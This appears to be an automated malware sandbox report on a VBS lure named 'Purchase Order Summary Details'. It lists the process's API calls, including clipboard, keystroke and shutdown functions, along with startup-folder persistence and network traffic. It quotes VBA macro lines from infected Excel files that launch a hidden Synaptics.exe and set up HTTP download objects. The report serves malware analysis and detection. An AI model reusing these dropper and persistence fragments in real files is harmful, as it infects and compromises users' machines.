                                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:50185 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50186 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50192 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50194 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50204 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50203 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50208 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50209 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50220 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50222 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50224 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50226 version: TLS 1.2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00177099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,15_2_00177099
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00177294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,15_2_00177294
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008D7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,22_2_008D7294
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00177294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,31_2_00177294
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00177099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,15_2_00177099
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00164342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,15_2_00164342

                                System Summary

                                barindex
                                Document contains an embedded VBA macro with suspicious strings
                                Source: uvpPtB1E.xlsm.16.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: uvpPtB1E.xlsm.16.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: uvpPtB1E.xlsm.16.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: uvpPtB1E.xlsm.16.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: uvpPtB1E.xlsm.16.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: uvpPtB1E.xlsm.16.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: uvpPtB1E.xlsm.16.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: uvpPtB1E.xlsm.16.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: uvpPtB1E.xlsm.16.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: uvpPtB1E.xlsm.16.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: uvpPtB1E.xlsm.16.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Source: UNKRLCVOHV.xlsm.16.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: UNKRLCVOHV.xlsm.16.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: UNKRLCVOHV.xlsm.16.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: UNKRLCVOHV.xlsm.16.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: UNKRLCVOHV.xlsm.16.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: UNKRLCVOHV.xlsm.16.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: UNKRLCVOHV.xlsm.16.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: UNKRLCVOHV.xlsm.16.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: UNKRLCVOHV.xlsm.16.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: UNKRLCVOHV.xlsm.16.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: UNKRLCVOHV.xlsm.16.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Document contains an embedded VBA with functions possibly related to ADO stream file operations
                                Source: uvpPtB1E.xlsm.16.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Source: UNKRLCVOHV.xlsm.16.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Document contains an embedded VBA with functions possibly related to HTTP operations
                                Source: uvpPtB1E.xlsm.16.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Source: UNKRLCVOHV.xlsm.16.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                                Source: uvpPtB1E.xlsm.16.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Source: UNKRLCVOHV.xlsm.16.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Sample has a suspicious name (potential lure to open the executable)
                                Source: Purchase Order Summary Details.vbsStatic file information: Suspicious name
                                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_001229C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,15_2_001229C2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_001902AA NtdllDialogWndProc_W,15_2_001902AA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0018E769 NtdllDialogWndProc_W,CallWindowProcW,15_2_0018E769
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0018EA4E NtdllDialogWndProc_W,15_2_0018EA4E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0018EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,15_2_0018EAA6
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0013AC99 NtdllDialogWndProc_W,15_2_0013AC99
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0018ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,15_2_0018ECBC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0013AD5C NtdllDialogWndProc_W,74E4C8D0,NtdllDialogWndProc_W,15_2_0013AD5C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0013AFB4 GetParent,NtdllDialogWndProc_W,15_2_0013AFB4
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0018EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,15_2_0018EFA8
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0018F0A1 SendMessageW,NtdllDialogWndProc_W,15_2_0018F0A1
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0018F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,15_2_0018F122
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0018F37C NtdllDialogWndProc_W,15_2_0018F37C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0018F3AB NtdllDialogWndProc_W,15_2_0018F3AB
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0018F3DA NtdllDialogWndProc_W,15_2_0018F3DA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0018F425 NtdllDialogWndProc_W,15_2_0018F425
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0018F45A ClientToScreen,NtdllDialogWndProc_W,15_2_0018F45A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0018F594 GetWindowLongW,NtdllDialogWndProc_W,15_2_0018F594
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0013B7F2 NtdllDialogWndProc_W,15_2_0013B7F2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0013B845 NtdllDialogWndProc_W,15_2_0013B845
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0018FE7D NtdllDialogWndProc_W,15_2_0018FE7D
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0018FE80 NtdllDialogWndProc_W,15_2_0018FE80
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0018FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,15_2_0018FF04
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0018FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,15_2_0018FF91
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008829C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,22_2_008829C2
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008F02AA NtdllDialogWndProc_W,22_2_008F02AA
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008EE769 NtdllDialogWndProc_W,CallWindowProcW,22_2_008EE769
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008EEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,22_2_008EEAA6
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008EEA4E NtdllDialogWndProc_W,22_2_008EEA4E
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_0089AC99 NtdllDialogWndProc_W,22_2_0089AC99
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008EECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,22_2_008EECBC
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_0089AD5C NtdllDialogWndProc_W,74E4C8D0,NtdllDialogWndProc_W,22_2_0089AD5C
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008EEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,22_2_008EEFA8
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_0089AFB4 GetParent,NtdllDialogWndProc_W,22_2_0089AFB4
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008EF0A1 SendMessageW,NtdllDialogWndProc_W,22_2_008EF0A1
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008EF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,22_2_008EF122
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008EF3AB NtdllDialogWndProc_W,22_2_008EF3AB
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008EF3DA NtdllDialogWndProc_W,22_2_008EF3DA
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008EF37C NtdllDialogWndProc_W,22_2_008EF37C
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008EF425 NtdllDialogWndProc_W,22_2_008EF425
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008EF45A ClientToScreen,NtdllDialogWndProc_W,22_2_008EF45A
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008EF594 GetWindowLongW,NtdllDialogWndProc_W,22_2_008EF594
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_0089B7F2 NtdllDialogWndProc_W,22_2_0089B7F2
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_0089B845 NtdllDialogWndProc_W,22_2_0089B845
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008EFE80 NtdllDialogWndProc_W,22_2_008EFE80
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008EFE7D NtdllDialogWndProc_W,22_2_008EFE7D
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008EFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,22_2_008EFF91
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008EFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,22_2_008EFF04
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_001229C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,31_2_001229C2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_001902AA NtdllDialogWndProc_W,31_2_001902AA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0018E769 NtdllDialogWndProc_W,CallWindowProcW,31_2_0018E769
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0018EA4E NtdllDialogWndProc_W,31_2_0018EA4E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0018EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,31_2_0018EAA6
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0013AC99 NtdllDialogWndProc_W,31_2_0013AC99
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0018ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,31_2_0018ECBC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0013AD5C NtdllDialogWndProc_W,74E4C8D0,NtdllDialogWndProc_W,31_2_0013AD5C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0013AFB4 GetParent,NtdllDialogWndProc_W,31_2_0013AFB4
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0018EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,31_2_0018EFA8
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0018F0A1 SendMessageW,NtdllDialogWndProc_W,31_2_0018F0A1
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0018F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,31_2_0018F122
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0018F37C NtdllDialogWndProc_W,31_2_0018F37C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0018F3AB NtdllDialogWndProc_W,31_2_0018F3AB
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0018F3DA NtdllDialogWndProc_W,31_2_0018F3DA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0018F425 NtdllDialogWndProc_W,31_2_0018F425
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0018F45A ClientToScreen,NtdllDialogWndProc_W,31_2_0018F45A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0018F594 GetWindowLongW,NtdllDialogWndProc_W,31_2_0018F594
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0013B7F2 NtdllDialogWndProc_W,31_2_0013B7F2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0013B845 NtdllDialogWndProc_W,31_2_0013B845
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0018FE7D NtdllDialogWndProc_W,31_2_0018FE7D
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0018FE80 NtdllDialogWndProc_W,31_2_0018FE80
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0018FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,31_2_0018FF04
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0018FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,31_2_0018FF91
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016702F: DeviceIoControl,CloseHandle,15_2_0016702F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0015B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74F65590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,15_2_0015B9F1
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_001682D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,15_2_001682D0
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008C82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,22_2_008C82D0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_001682D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,31_2_001682D0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_001830AD15_2_001830AD
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0013368015_2_00133680
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0012DCD015_2_0012DCD0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0012A0C015_2_0012A0C0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0014018315_2_00140183
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016220C15_2_0016220C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0012853015_2_00128530
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0012667015_2_00126670
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0014067715_2_00140677
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0018A8DC15_2_0018A8DC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00140A8F15_2_00140A8F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00126BBC15_2_00126BBC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0014AC8315_2_0014AC83
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0013AD5C15_2_0013AD5C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00154EBF15_2_00154EBF
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00140EC415_2_00140EC4
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0015113E15_2_0015113E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_001412F915_2_001412F9
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0015542F15_2_0015542F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0015599F15_2_0015599F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00125D3215_2_00125D32
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0012BDF015_2_0012BDF0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0014BDF615_2_0014BDF6
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00141E5A15_2_00141E5A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0014DF6915_2_0014DF69
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016BFB815_2_0016BFB8
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00157FFD15_2_00157FFD
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_0088DCD022_2_0088DCD0
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_0088A0C022_2_0088A0C0
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008A018322_2_008A0183
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008C220C22_2_008C220C
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_0088853022_2_00888530
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_0088667022_2_00886670
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008A067722_2_008A0677
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008EA8DC22_2_008EA8DC
